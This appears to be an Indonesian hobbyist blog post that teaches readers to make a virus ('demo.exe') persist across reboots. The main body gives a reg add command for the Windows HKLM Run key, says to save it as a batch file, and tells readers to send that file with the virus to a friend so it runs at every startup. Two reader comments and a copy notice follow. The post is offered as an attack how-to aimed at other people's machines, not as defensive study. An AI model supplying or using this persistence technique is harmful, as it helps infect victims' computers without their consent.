Jalankan virus di Start up

2 pendepatmu
Anda harus terbiasa dengan virus dan mungkin anda harus mengetahui bagaimana kita dapat menciptakan mereka(virus). Setelah virus dieksekusi maka akan terlihat dampaknya tetapi itu akan berlangsung sampai sistem menyala, Jika Anda akan mematikan sistem, semua proses virus ini juga akan terbunuh.

Jadi kebutuhan kita adalah dengan menjalankan virus kita lagi bahkan jika sistem bisa reboot. Jadi untuk itu kita harus mengirim virus kamu pada start up. Tapi kekadang kita tidak ingin mengirimnya secara manual , dan kali ini bukan yang kita ingin mengirimkannya. Tapi dengan bantuan file batch.

Jadi mari kita membuat demo.exe virus.

Ikuti langkah - langkah berikut untuk mengirim pada Start up.

1. Buka file Notepad

2. Tuliskan perintah berikut kedalam notepad :

reg add HKLM \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run / v demo / t REG_SZ / d demo.exe

3. Sekarang simpan file notepad dengan nama apapun. contoh wisma tapi ekstensi harus bat. Berarti kita harus membuat sebuah file batch misalnya: wisma.bat.

4. Sekarang kirim wisma.bat bersama dengan virus demo.exe ke teman Anda. Setiap kali dia akan klik pada file wisma.bat otomatis demo.exe akan mencapai di start up.

5. Sekarang dampak dari virus ini juga akan terlihat setelah restart sistem.


* beberapa hari kedepan saya akan memberi video tutorial tentang artikel ini, agar anda lebih paham.dan bisa mempraktekannya.

* thanks telah membaca artikel saya ini, salam dari RIZKY RAHMATULLAH

2 Responses so far

  1. kurang paham,,,,tpi seap laa

  2. Unknown says:

    yo kurang phamz sisan !

Leave a Reply

Dilarang COPAS ( Copy Paste ), saya harap anda bisa mengerti. Tapi saya tidak melarang COPAS ( Copy Paste ) asal dengan satu syarat, Anda harus izin kepada saya melalui komentar dan berikan alamat sumbernya. Bagi anda yang jujur, saya akan memberi bantuan kepada blog anda agar pengunjung/stastik banyak. Terimah kasih atas perhatiaannya. Semoga Bermanfaat

Salam : RIZKY RAHMATULLAH